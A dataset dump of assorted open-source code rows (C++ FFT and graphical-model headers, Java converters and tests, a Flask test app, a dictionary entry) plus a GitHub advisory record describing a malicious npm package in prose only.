Dataset columns:
  max_stars_count   int64     301 – 224k
  text              string    lengths 6 – 1.05M
  token_count       int64     3 – 727k

Rows below follow the column order (max_stars_count, text, token_count):
318
#pragma once
#ifndef OPENGM_OPERATION_NORMALIZE_HXX
#define OPENGM_OPERATION_NORMALIZE_HXX

#include <typeinfo>

#include "opengm/opengm.hxx"
#include "opengm/operations/multiplier.hxx"

namespace opengm {

/// Normalization w.r.t. a binary operation (e.g. Multiplier) and a unary accumulation (e.g. Integrator)
struct Normalization {
   template<class ACC, class OP, class T>
   static void normalize(T& out) {
      typename T::ValueType v;
      out.template accumulate<ACC>(v);
      if(typeid(OP) == typeid(opengm::Multiplier) && v <= 0.00001) {
         return;
      }
      if(typeid(OP) == typeid(opengm::Multiplier)) {
         OPENGM_ASSERT(v > 0.00001);
      }
      OP::iop(v, out);
   }
};

} // namespace opengm

#endif // #ifndef OPENGM_OPERATION_NORMALIZE_HXX
340
389
/* * Copyright 2014 <NAME>, Inc. */ package gw.internal.gosu.parser.coercion; import gw.lang.parser.exceptions.ParseResultsException; import gw.lang.parser.resources.Res; import gw.test.TestClass; import gw.util.GosuTestUtil; /** */ public class CrossCastTest extends TestClass { public void testCrossCastClassToInterface() throws ParseResultsException { try { GosuTestUtil.compileExpression( "new java.awt.Button() as java.lang.Runnable" ); } catch( ParseResultsException e ) { fail( "Should have accepted cast from Button to Runnable" ); } } public void testErrantCrossCastPrimitiveToInterface() throws ParseResultsException { try { GosuTestUtil.compileExpression( "0 as int as java.lang.Runnable" ); } catch( ParseResultsException e ) { assertEquals( 1, e.getParseExceptions().size() ); assertEquals( Res.MSG_TYPE_MISMATCH, e.getParseExceptions().get( 0 ).getMessageKey() ); } } public void testErrantCrossCastFinalToInterface() throws ParseResultsException { try { GosuTestUtil.compileExpression( "new java.lang.StringBuilder() as java.lang.Runnable" ); } catch( ParseResultsException e ) { assertEquals( 1, e.getParseExceptions().size() ); assertEquals( Res.MSG_TYPE_MISMATCH, e.getParseExceptions().get( 0 ).getMessageKey() ); } } }
535
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #include <precomp.h> #include "cmd_run.hxx" // NOT FULLY DEFINED SERVICES #include <cosv/file.hxx> #include <cosv/x.hxx> #include <ary/ary.hxx> #include <ary/cpp/c_gate.hxx> #include <ary/idl/i_ce.hxx> #include <ary/idl/i_gate.hxx> #include <ary/idl/i_module.hxx> #include <ary/idl/ip_ce.hxx> #include <autodoc/filecoli.hxx> #include <autodoc/parsing.hxx> #include <autodoc/prs_code.hxx> #include <autodoc/prs_docu.hxx> #include <parser/unoidl.hxx> #include <adc_cl.hxx> #include "adc_cmd_parse.hxx" #include "adc_cmds.hxx" namespace autodoc { namespace command { namespace run { Parser::Parser( const Parse & i_command ) : rCommand(i_command), pCppParser(), pCppDocuInterpreter(), pIdlParser() { } Parser::~Parser() { } bool Parser::Perform() { Cout() << "Parsing the repository " << rCommand.ReposyName() << " ..." << Endl(); try { ::ary::Repository & rAry = CommandLine::Get_().TheRepository(); rAry.Set_Title(rCommand.ReposyName()); Dyn< FileCollector_Ifc > pFiles( ParseToolsFactory().Create_FileCollector(6000) ); bool bIDL = false; bool bCpp = false; command::Parse::ProjectIterator itEnd = rCommand.ProjectsEnd(); for ( command::Parse::ProjectIterator it = rCommand.ProjectsBegin(); it != itEnd; ++it ) { uintt nCount = GatherFiles( *pFiles, *(*it) ); Cout() << nCount << " files found to parse in project " << (*it)->Name() << "." << Endl(); switch ( (*it)->Language().eLanguage ) { case command::S_LanguageInfo::idl: { Get_IdlParser().Run(*pFiles); bIDL = true; } break; case command::S_LanguageInfo::cpp: { Get_CppParser().Run( *pFiles ); bCpp = true; } break; default: Cerr() << "Project in yet unimplemented language skipped." << Endl(); } } // end for if (bCpp) { rAry.Gate_Cpp().Calculate_AllSecondaryInformation(); } if (bIDL) { rAry.Gate_Idl().Calculate_AllSecondaryInformation( rCommand.DevelopersManual_RefFilePath() ); // ::ary::idl::SecondariesPilot & // rIdl2sPilot = rAry.Gate_Idl().Secondaries(); // // rIdl2sPilot.CheckAllInterfaceBases( rAry.Gate_Idl() ); // rIdl2sPilot.Connect_Types2Ces(); // rIdl2sPilot.Gather_CrossReferences(); // // if (NOT rCommand.DevelopersManual_RefFilePath().empty()) // { // csv::File // aFile(rCommand.DevelopersManual_RefFilePath(), csv::CFM_READ); // if ( aFile.open() ) // { // rIdl2sPilot.Read_Links2DevManual(aFile); // aFile.close(); // } // } } // endif (bIDL) return true; } // end try catch (csv::Exception & xx) { xx.GetInfo(Cerr()); Cerr() << " program will exit." 
<< Endl(); return false; } } CodeParser_Ifc & Parser::Get_CppParser() { if ( NOT pCppParser ) Create_CppParser(); return *pCppParser; } IdlParser & Parser::Get_IdlParser() { if ( NOT pIdlParser ) Create_IdlParser(); return *pIdlParser; } void Parser::Create_CppParser() { pCppParser = ParseToolsFactory().Create_Parser_Cplusplus(); pCppDocuInterpreter = ParseToolsFactory().Create_DocuParser_AutodocStyle(); pCppParser->Setup( CommandLine::Get_().TheRepository(), *pCppDocuInterpreter, CommandLine::Get_().IgnoreDefines() ); } void Parser::Create_IdlParser() { pIdlParser = new IdlParser(CommandLine::Get_().TheRepository()); } const ParseToolsFactory_Ifc & Parser::ParseToolsFactory() { return ParseToolsFactory_Ifc::GetIt_(); } uintt Parser::GatherFiles( FileCollector_Ifc & o_rFiles, const S_ProjectData & i_rProject ) { uintt ret = 0; o_rFiles.EraseAll(); typedef StringVector StrVector; typedef StrVector::const_iterator StrIterator; const S_Sources & rSources = i_rProject.Sources(); const StrVector & rExtensions = i_rProject.Language().aExtensions; StrIterator it; StrIterator itTreesEnd = rSources.aTrees.end(); StrIterator itDirsEnd = rSources.aDirectories.end(); StrIterator itFilesEnd = rSources.aFiles.end(); StrIterator itExt; StrIterator itExtEnd = rExtensions.end(); csv::StreamStr aDir(500); i_rProject.RootDirectory().Get( aDir ); uintt nProjectDir_AddPosition = ( strcmp(aDir.c_str(),".\\") == 0 OR strcmp(aDir.c_str(),"./") == 0 ) ? 0 : uintt( aDir.tellp() ); for ( it = rSources.aDirectories.begin(); it != itDirsEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::flat ); } // end for itExt } // end for it for ( it = rSources.aTrees.begin(); it != itTreesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::recursive ); } // end for itExt } // end for it for ( it = rSources.aFiles.begin(); it != itFilesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; o_rFiles.AddFile( aDir.c_str() ); } // end for it ret += rSources.aFiles.size(); return ret; } } // namespace run } // namespace command #if 0 inline const ParseToolsFactory_Ifc & CommandRunner::ParseToolsFactory() { return ParseToolsFactory_Ifc::GetIt_(); } inline const command::S_LanguageInfo & CommandRunner::Get_ProjectLanguage( const command::Parse & i_rCommand, const command::S_ProjectData & i_rProject ) { if ( i_rProject.pLanguage ) return *i_rProject.pLanguage; return *i_rCommand.GlobalLanguageInfo(); } inline bool CommandRunner::HasParsedCpp() const { return pCppParser; } inline bool CommandRunner::HasParsedIdl() const { return pIdlParser; } CommandRunner::CommandRunner() : pCommandLine(0), pReposy(0), pNewReposy(0), nResultCode(0) { Cout() << "\nAutodoc version 2.2.1" << "\n-------------------" << "\n" << Endl(); } CommandRunner::~CommandRunner() { ary::Repository::Destroy_(); Cout() << "\n" << Endl(); } void CommandRunner::Run( const CommandLine & i_rCL ) { ary::Repository::Destroy_(); // ary::Repository::Destroy_(); pReposy = 0; pNewReposy = 0; nResultCode = 0; pCommandLine = &i_rCL; pCommandLine->Run(); } void CommandRunner::Parse() { try { csv_assert( pCommandLine->Cmd_Parse() != 0 ); const command::Parse & rCmd = *pCommandLine->Cmd_Parse(); Cout() << "Parsing the repository " << rCmd.ReposyName() << " ..." 
<< Endl(); if ( pReposy == 0 ) pReposy = & ary::Repository::Create_( rCmd.ReposyName(), 0 ); if ( pNewReposy == 0 ) pNewReposy = & ary::Repository::Create_( rCmd.ReposyName() ); Dyn< FileCollector_Ifc > pFiles; pFiles = ParseToolsFactory().Create_FileCollector(6000); bool bCpp = false; bool bIDL = false; command::Parse::ProjectIterator itEnd = rCmd.ProjectsEnd(); for ( command::Parse::ProjectIterator it = rCmd.ProjectsBegin(); it != itEnd; ++it ) { uintt nCount = GatherFiles( *pFiles, rCmd, *(*it) ); Cout() << nCount << " files found to parse in project " << (*it)->Name() << "." << Endl(); switch ( Get_ProjectLanguage(rCmd, *(*it)).eLanguage ) { case command::S_LanguageInfo::cpp: { Get_CppParser().Run( (*it)->Name(), (*it)->RootDirectory(), *pFiles ); bCpp = true; } break; case command::S_LanguageInfo::idl: { Get_IdlParser().Run(*pFiles); bIDL = true; } break; default: Cerr() << "Project in yet unimplemented language skipped." << Endl(); } } // end for if (bCpp) pReposy->RwGate_Cpp().Connect_AllTypes_2_TheirRelated_CodeEntites(); if (bIDL) { pNewReposy->Gate_Idl().Secondaries().Connect_Types2Ces(); pNewReposy->Gate_Idl().Secondaries().Gather_CrossReferences(); } } // end try catch (csv::Exception & xx) { xx.GetInfo(Cerr()); Cerr() << " program will exit." << Endl(); nResultCode = 1; } catch (...) { Cerr() << "Unknown exception - program will exit." << Endl(); nResultCode = 1; } } void CommandRunner::Load() { Cout() << "This would load the repository from the directory " << pCommandLine->Cmd_Load()->ReposyDir() << "." << Endl(); } void CommandRunner::Save() { Cout() << "This would save the repository into the directory " << pCommandLine->Cmd_Save()->ReposyDir() << "." << Endl(); } void CommandRunner::CreateHtml() { Cout() << "Creating HTML-output into the directory " << pCommandLine->Cmd_CreateHtml()->OutputDir() << "." << Endl(); if ( HasParsedCpp() ) CreateHtml_NewStyle(); if ( HasParsedIdl() ) CreateHtml_OldIdlStyle(); } void CommandRunner::CreateXml() { Cout() << "This would create the XML-output into the directory " << pCommandLine->Cmd_CreateXml()->OutputDir() << "." << Endl(); } CodeParser_Ifc & CommandRunner::Get_CppParser() { if ( NOT pCppParser ) Create_CppParser(); return *pCppParser; } IdlParser & CommandRunner::Get_IdlParser() { if ( NOT pIdlParser ) Create_IdlParser(); return *pIdlParser; } void CommandRunner::Create_CppParser() { pCppParser = ParseToolsFactory().Create_Parser_Cplusplus(); pCppDocuInterpreter = ParseToolsFactory().Create_DocuParser_AutodocStyle(); pCppParser->Setup( *pReposy, *pCppDocuInterpreter ); } void CommandRunner::Create_IdlParser() { pIdlParser = new IdlParser(*pNewReposy); } uintt CommandRunner::GatherFiles( FileCollector_Ifc & o_rFiles, const command::Parse & i_rCommand, const command::S_ProjectData & i_rProject ) { uintt ret = 0; o_rFiles.EraseAll(); typedef StringVector StrVector; typedef StrVector::const_iterator StrIterator; const command::S_Sources & rSources = i_rProject.aFiles; const StrVector & rExtensions = Get_ProjectLanguage(i_rCommand,i_rProject).aExtensions; StrIterator it; StrIterator itDirsEnd = rSources.aDirectories.end(); StrIterator itTreesEnd = i_rProject.aFiles.aTrees.end(); StrIterator itFilesEnd = i_rProject.aFiles.aFiles.end(); StrIterator itExt; StrIterator itExtEnd = rExtensions.end(); csv::StreamStr aDir(500); i_rProject.aRootDirectory.Get( aDir ); uintt nProjectDir_AddPosition = ( strcmp(aDir.c_str(),".\\") == 0 OR strcmp(aDir.c_str(),"./") == 0 ) ? 
0 : uintt( aDir.tellp() ); for ( it = rSources.aDirectories.begin(); it != itDirsEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::flat ); } // end for itExt } // end for it for ( it = rSources.aTrees.begin(); it != itTreesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::recursive ); } // end for itExt } // end for it for ( it = rSources.aFiles.begin(); it != itFilesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; o_rFiles.AddFile( aDir.c_str() ); } // end for it ret += rSources.aFiles.size(); return ret; } void CommandRunner::CreateHtml_NewStyle() { const ary::cpp::DisplayGate & rGate = pReposy->DisplayGate_Cpp(); Dyn< autodoc::HtmlDisplay_UdkStd > pHtmlDisplay; pHtmlDisplay = DisplayToolsFactory_Ifc::GetIt_() .Create_HtmlDisplay_UdkStd(); pHtmlDisplay->Run( pCommandLine->Cmd_CreateHtml()->OutputDir(), rGate, DisplayToolsFactory_Ifc::GetIt_().Create_StdFrame() ); } void CommandRunner::CreateHtml_OldIdlStyle() { ary::idl::Gate & rAryGate = pNewReposy->Gate_Idl(); // Read DevManualLinkFile: // KORR_FUTURE csv::File aFile("devmanref.txt", csv::CFM_READ); if ( aFile.open() ) { rAryGate.Secondaries().Read_Links2DevManual(aFile); aFile.close(); } // New Style Output Dyn<autodoc::HtmlDisplay_Idl_Ifc> pNewDisplay; pNewDisplay = DisplayToolsFactory_Ifc::GetIt_() .Create_HtmlDisplay_Idl(); pNewDisplay->Run( pCommandLine->Cmd_CreateHtml()->OutputDir(), rAryGate, DisplayToolsFactory_Ifc::GetIt_().Create_StdFrame() ); } #endif // 0 } // namespace autodoc
7,759
11,699
<reponame>kxxt/taichi<filename>taichi/backends/metal/env_config.cpp
#include "taichi/backends/metal/env_config.h"

#include "taichi/lang_util.h"
#include "taichi/util/environ_config.h"

TLANG_NAMESPACE_BEGIN

namespace metal {

EnvConfig::EnvConfig() {
  simdgroup_enabled_ =
      get_environ_config("TI_USE_METAL_SIMDGROUP", /*default_value=*/1);
}

const EnvConfig &EnvConfig::instance() {
  static const EnvConfig c;
  return c;
}

}  // namespace metal

TLANG_NAMESPACE_END
195
308
<filename>tests/contrib/flask/web.py<gh_stars>100-1000 # -*- coding: utf-8 -*- import os from flask import Flask from flask import render_template class TestError(Exception): pass class HandleMe(Exception): pass def create_app(): """Initializes a new Flask application. This method is required to be sure each time a test is executed, the Flask app is always new and without any tracing side effect from the previous execution. """ cur_dir = os.path.dirname(os.path.realpath(__file__)) tmpl_path = os.path.join(cur_dir, "test_templates") app = Flask(__name__, template_folder=tmpl_path) @app.route("/") def index(): return "hello" @app.route("/error") def error(): raise TestError() @app.route("/handleme") def handle_me(): raise HandleMe() @app.route("/fatal") def fatal(): 1 / 0 @app.route("/tmpl") def tmpl(): return render_template("test.html", world="earth") @app.route("/tmpl/err") def tmpl_err(): return render_template("err.html") @app.route("/tmpl/render_err") def tmpl_render_err(): return render_template("render_err.html") @app.route("/child") def child(): with app._tracer.trace("child") as span: span.set_tag("a", "b") return "child" @app.route("/custom_span") def custom_span(): span = app._tracer.current_span() assert span span.resource = "overridden" return "hiya" def unicode_view(): return u"üŋïĉóđē" app.add_url_rule( u"/üŋïĉóđē", u"üŋïĉóđē", unicode_view, ) @app.errorhandler(TestError) def handle_my_exception(e): assert isinstance(e, TestError) return "error", 500 @app.errorhandler(HandleMe) def err_to_202(e): assert isinstance(e, HandleMe) return "handled", 202 return app
860
335
{ "word": "Essentialism", "definitions": [ "A belief that things have a set of characteristics which make them what they are, and that the task of science and philosophy is their discovery and expression; the doctrine that essence is prior to existence.", "The view that all children should be taught on traditional lines the ideas and methods regarded as essential to the prevalent culture.", "The view that categories of people, such as women and men, or heterosexuals and homosexuals, or members of ethnic groups, have intrinsically different and characteristic natures or dispositions." ], "parts-of-speech": "Noun" }
169
541
<filename>dspace-server-webapp/src/main/java/org/dspace/app/rest/converter/CollectionConverter.java /** * The contents of this file are subject to the license and copyright * detailed in the LICENSE and NOTICE files at the root of the source * tree and available online at * * http://www.dspace.org/license/ */ package org.dspace.app.rest.converter; import org.dspace.app.rest.model.CollectionRest; import org.dspace.content.Collection; import org.dspace.discovery.IndexableObject; import org.springframework.stereotype.Component; /** * This is the converter from/to the Collection in the DSpace API data model and * the REST data model * * @author <NAME> (andrea.bollini at 4science.it) */ @Component public class CollectionConverter extends DSpaceObjectConverter<Collection, CollectionRest> implements IndexableObjectConverter<Collection, CollectionRest> { @Override protected CollectionRest newInstance() { return new CollectionRest(); } @Override public Class<org.dspace.content.Collection> getModelClass() { return org.dspace.content.Collection.class; } @Override public boolean supportsModel(IndexableObject idxo) { return idxo.getIndexedObject() instanceof Collection; } }
399
2,854
/* * Copyright 2019 Qameta Software OÜ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.qameta.allure.entity; import java.util.List; import java.util.Optional; import java.util.stream.Collector; import java.util.stream.Collectors; /** * @author <NAME> <EMAIL> * Date: 31.01.16 */ public interface WithLabels { List<Label> getLabels(); void setLabels(List<Label> labels); default <T> T findAll(LabelName name, Collector<String, ?, T> collector) { return findAll(name.value(), collector); } default <T> T findAll(String name, Collector<String, ?, T> collector) { return getLabels().stream() .filter(label -> name.equals(label.getName())) .map(Label::getValue) .collect(collector); } default List<String> findAll(LabelName name) { return findAll(name, Collectors.toList()); } default List<String> findAll(String name) { return findAll(name, Collectors.toList()); } default Optional<String> findOne(LabelName name) { return findOne(name.value()); } default Optional<String> findOne(String name) { return getLabels().stream() .filter(label -> name.equals(label.getName())) .map(Label::getValue) .findAny(); } default void addLabelIfNotExists(LabelName name, String value) { addLabelIfNotExists(name.value(), value); } default void addLabelIfNotExists(String name, String value) { if (value == null || name == null) { return; } final Optional<String> any = getLabels().stream() .map(Label::getName) .filter(name::equals) .findAny(); if (!any.isPresent()) { addLabel(name, value); } } default void addLabel(String name, String value) { getLabels().add(new Label().setName(name).setValue(value)); } }
982
362
<reponame>yuhao-su/RECIPE-TEST
/**
 *    author:   UncP
 *    date:     2018-10-05
 *    license:  BSD-3
**/

#ifndef _mass_tree_h_
#define _mass_tree_h_

#include "mass_node.h"

typedef struct mass_tree
{
  mass_node *root;
}mass_tree;

mass_tree* new_mass_tree();
void free_mass_tree(mass_tree *mt);

int mass_tree_put(mass_tree *mt, const void *key, uint32_t len, const void *val);
void* mass_tree_get(mass_tree *mt, const void *key, uint32_t len);

#ifdef Test
void mass_tree_validate(mass_tree *mt);
#endif // Test

#endif /* _mass_tree_h_ */
246
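For reference, a minimal caller of the API declared in the mass_tree header above could look like the following sketch. It uses only the functions declared there; the extern "C" wrapping, the key/value contents, and the assumption that stored values stay owned by the caller are not taken from the original sources.

#include <cstdint>
#include <cstdio>
#include <cstring>

extern "C" {
#include "mass_tree.h"   // header shown above; extern "C" wrapping is an assumption
}

int main() {
  mass_tree *mt = new_mass_tree();

  const char *key = "hello";
  const char *val = "world";
  // put/get take (tree, key, key_length, value); value lifetime is assumed to
  // remain with the caller.
  mass_tree_put(mt, key, (uint32_t)std::strlen(key), val);

  void *found = mass_tree_get(mt, key, (uint32_t)std::strlen(key));
  std::printf("lookup %s -> %s\n", key, found ? (const char *)found : "(not found)");

  free_mass_tree(mt);
  return 0;
}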
348
{"nom":"<NAME>","circ":"5ème circonscription","dpt":"Maine-et-Loire","inscrits":1355,"abs":763,"votants":592,"blancs":45,"nuls":5,"exp":542,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":360},{"nuance":"DVD","nom":"M. <NAME>","voix":182}]}
99
892
{ "schema_version": "1.2.0", "id": "GHSA-322m-p39j-r5m2", "modified": "2020-08-31T18:24:48Z", "published": "2020-09-01T18:55:37Z", "aliases": [ "CVE-2017-16128" ], "summary": "Malicious Package in npm-script-demo", "details": "The `npm-script-demo` package is a piece of malware that opens a connection to a command and control server and executed the instructions it is given.\n\nIt has been removed from the npm registry.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer has been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": [ ], "affected": [ { "package": { "ecosystem": "npm", "name": "npm-script-demo" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ] } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16128" }, { "type": "WEB", "url": "https://nodesecurity.io/advisories/481" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/481" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "severity": "MODERATE", "github_reviewed": true } }
693
1,066
#ifndef KISSFFT_I32_CLASS_HH #define KISSFFT_I32_CLASS_HH #include <complex> #include <utility> #include <vector> // TODO1: substitute complex<type> (behaviour not defined for nonfloats), should be faster // TODO2: use std:: namespace // TODO3: make unittests for all ffts (c, cpp, i32) template <typename DType> struct complex_s { DType real; DType imag; }; class kissfft_i32 { private: using scalar_type = int32_t; using cpx_type = complex<int32_t>; scalar_type _scale_factor; std::size_t _nfft; bool _inverse; std::vector<cpx_type> _twiddles; std::vector<std::size_t> _stageRadix; std::vector<std::size_t> _stageRemainder; public: // scale_factor: upscale twiddle-factors otherwise they lie between 0..1 (out of range for integer) --> fixed point math kissfft_i32(const std::size_t nfft, const bool inverse, const double scale_factor = 1024.0) : _scale_factor(scalar_type(scale_factor)), _nfft(nfft), _inverse(inverse) { // fill twiddle factors _twiddles.resize(_nfft); const double phinc = (_inverse ? 2 : -2) * acos(-1.0) / _nfft; for (std::size_t i = 0; i < _nfft; ++i) { _twiddles[i] = scale_factor * exp(complex<double>(0, i * phinc)); } //factorize //start factoring out 4's, then 2's, then 3,5,7,9,... std::size_t n = _nfft; std::size_t p = 4; do { while (n % p) { switch (p) { case 4: p = 2; break; case 2: p = 3; break; default: p += 2; break; } if (p * p > n) p = n;// no more factors } n /= p; _stageRadix.push_back(p); _stageRemainder.push_back(n); } while (n > 1); } /// Calculates the complex Discrete Fourier Transform. /// /// The size of the passed arrays must be passed in the constructor. /// The sum of the squares of the absolute values in the @c dst /// array will be @c N times the sum of the squares of the absolute /// values in the @c src array, where @c N is the size of the array. /// In other words, the l_2 norm of the resulting array will be /// @c sqrt(N) times as big as the l_2 norm of the input array. /// This is also the case when the inverse flag is set in the /// constructor. Hence when applying the same transform twice, but with /// the inverse flag changed the second time, then the result will /// be equal to the original input times @c N. 
void transform(const cpx_type * FSrc, cpx_type * FDst, const std::size_t stage = 0, const std::size_t fstride = 1, const std::size_t in_stride = 1) const { const std::size_t p = _stageRadix[stage]; const std::size_t m = _stageRemainder[stage]; cpx_type *const Fout_beg = FDst; cpx_type *const Fout_end = FDst + p * m; if (m == 1) { do { *FDst = *FSrc; FSrc += fstride * in_stride; } while (++FDst != Fout_end); } else { do { // recursive call: // DFT of size m*p performed by doing // p instances of smaller DFTs of size m, // each one takes a decimated version of the input transform(FSrc, FDst, stage + 1, fstride * p, in_stride); FSrc += fstride * in_stride; } while ((FDst += m) != Fout_end); } FDst = Fout_beg; // recombine the p smaller DFTs switch (p) { case 2: kf_bfly2(FDst, fstride, m); break; case 3: kf_bfly3(FDst, fstride, m); break; case 4: kf_bfly4(FDst, fstride, m); break; case 5: kf_bfly5(FDst, fstride, m); break; default: kf_bfly_generic(FDst, fstride, m, p); break; } } private: void kf_bfly2(cpx_type *const Fout, const size_t fstride, const std::size_t m) const { for (std::size_t k = 0; k < m; ++k) { const cpx_type t = (Fout[m + k] * _twiddles[k * fstride]) / _scale_factor; Fout[m + k] = Fout[k] - t; Fout[k] += t; } } void kf_bfly3(cpx_type *Fout, const std::size_t fstride, const std::size_t m) const { std::size_t k = m; const std::size_t m2 = 2 * m; const cpx_type *tw1, *tw2; cpx_type scratch[5]; const cpx_type epi3 = _twiddles[fstride * m]; tw1 = tw2 = &_twiddles[0]; do { scratch[1] = (Fout[m] * *tw1) / _scale_factor; scratch[2] = (Fout[m2] * *tw2) / _scale_factor; scratch[3] = scratch[1] + scratch[2]; scratch[0] = scratch[1] - scratch[2]; tw1 += fstride; tw2 += fstride * 2; Fout[m] = Fout[0] - (scratch[3] / 2); scratch[0] *= epi3.imag(); scratch[0] /= _scale_factor; Fout[0] += scratch[3]; Fout[m2] = cpx_type(Fout[m].real() + scratch[0].imag(), Fout[m].imag() - scratch[0].real()); Fout[m] += cpx_type(-scratch[0].imag(), scratch[0].real()); ++Fout; } while (--k); } void kf_bfly4(cpx_type *const Fout, const std::size_t fstride, const std::size_t m) const { cpx_type scratch[7]; const scalar_type negative_if_inverse = _inverse ? 
-1 : +1; for (std::size_t k = 0; k < m; ++k) { scratch[0] = (Fout[k + m] * _twiddles[k * fstride]) / _scale_factor; scratch[1] = (Fout[k + 2 * m] * _twiddles[k * fstride * 2]) / _scale_factor; scratch[2] = (Fout[k + 3 * m] * _twiddles[k * fstride * 3]) / _scale_factor; scratch[5] = Fout[k] - scratch[1]; Fout[k] += scratch[1]; scratch[3] = scratch[0] + scratch[2]; scratch[4] = scratch[0] - scratch[2]; scratch[4] = cpx_type(scratch[4].imag() * negative_if_inverse, -scratch[4].real() * negative_if_inverse); Fout[k + 2 * m] = Fout[k] - scratch[3]; Fout[k] += scratch[3]; Fout[k + m] = scratch[5] + scratch[4]; Fout[k + 3 * m] = scratch[5] - scratch[4]; } } void kf_bfly5(cpx_type *const Fout, const std::size_t fstride, const std::size_t m) const { cpx_type *Fout0, *Fout1, *Fout2, *Fout3, *Fout4; cpx_type scratch[13]; const cpx_type ya = _twiddles[fstride * m]; const cpx_type yb = _twiddles[fstride * 2 * m]; Fout0 = Fout; Fout1 = Fout0 + m; Fout2 = Fout0 + 2 * m; Fout3 = Fout0 + 3 * m; Fout4 = Fout0 + 4 * m; for (std::size_t u = 0; u < m; ++u) { scratch[0] = *Fout0; scratch[1] = (*Fout1 * _twiddles[u * fstride]) / _scale_factor; scratch[2] = (*Fout2 * _twiddles[2 * u * fstride]) / _scale_factor; scratch[3] = (*Fout3 * _twiddles[3 * u * fstride]) / _scale_factor; scratch[4] = (*Fout4 * _twiddles[4 * u * fstride]) / _scale_factor; scratch[7] = scratch[1] + scratch[4]; scratch[10] = scratch[1] - scratch[4]; scratch[8] = scratch[2] + scratch[3]; scratch[9] = scratch[2] - scratch[3]; *Fout0 += scratch[7]; *Fout0 += scratch[8]; scratch[5] = scratch[0] + (cpx_type( scratch[7].real() * ya.real() + scratch[8].real() * yb.real(), scratch[7].imag() * ya.real() + scratch[8].imag() * yb.real() ) / _scale_factor); scratch[6] = cpx_type( scratch[10].imag() * ya.imag() + scratch[9].imag() * yb.imag(), -scratch[10].real() * ya.imag() - scratch[9].real() * yb.imag() ) / _scale_factor; *Fout1 = scratch[5] - scratch[6]; *Fout4 = scratch[5] + scratch[6]; scratch[11] = scratch[0] + (cpx_type( scratch[7].real() * yb.real() + scratch[8].real() * ya.real(), scratch[7].imag() * yb.real() + scratch[8].imag() * ya.real() ) / _scale_factor); scratch[12] = cpx_type( -scratch[10].imag() * yb.imag() + scratch[9].imag() * ya.imag(), scratch[10].real() * yb.imag() - scratch[9].real() * ya.imag() ) / _scale_factor; *Fout2 = scratch[11] + scratch[12]; *Fout3 = scratch[11] - scratch[12]; ++Fout0; ++Fout1; ++Fout2; ++Fout3; ++Fout4; } } /* perform the butterfly for one stage of a mixed radix FFT */ void kf_bfly_generic(cpx_type * const Fout, const size_t fstride, const std::size_t m, const std::size_t p) const { const cpx_type *twiddles = &_twiddles[0]; cpx_type scratchbuf[p]; for (std::size_t u = 0; u < m; ++u) { std::size_t k = u; for (std::size_t q1 = 0; q1 < p; ++q1) { scratchbuf[q1] = Fout[k]; k += m; } k = u; for (std::size_t q1 = 0; q1 < p; ++q1) { std::size_t twidx = 0; Fout[k] = scratchbuf[0]; for (std::size_t q = 1; q < p; ++q) { twidx += fstride * k; if (twidx >= _nfft) twidx -= _nfft; Fout[k] += (scratchbuf[q] * twiddles[twidx]) / _scale_factor; } k += m; } } } }; #endif
5,607
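A minimal sketch of driving the kissfft_i32 class defined above: it constructs a forward transform and calls transform(src, dst) with the stage/stride parameters left at their defaults. The header file name, the transform size, the input values, and the assumption that cpx_type resolves to std::complex<int32_t> are all illustrative choices, not part of the original file.

#include <complex>
#include <cstdint>
#include <vector>

#include "kissfft_i32.hh"   // assumed file name for the class defined above

int main() {
  const std::size_t nfft = 8;
  kissfft_i32 fft(nfft, /*inverse=*/false);   // default fixed-point scale factor (1024)

  std::vector<std::complex<int32_t>> input(nfft), output(nfft);
  for (std::size_t i = 0; i < nfft; ++i)
    input[i] = std::complex<int32_t>(static_cast<int32_t>(i), 0);

  // Top-level call: recursion over stages happens inside transform().
  fft.transform(input.data(), output.data());
  return 0;
}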
987
<gh_stars>100-1000
//
// Created by XINGKAICHUN on 2021/9/14.
//

#include "MerkleTreeUtil.h"
#include "Sha256Util.h"
#include "../util/ByteUtil.h"
#include "../util/MathUtil.h"

namespace MerkleTreeUtil{

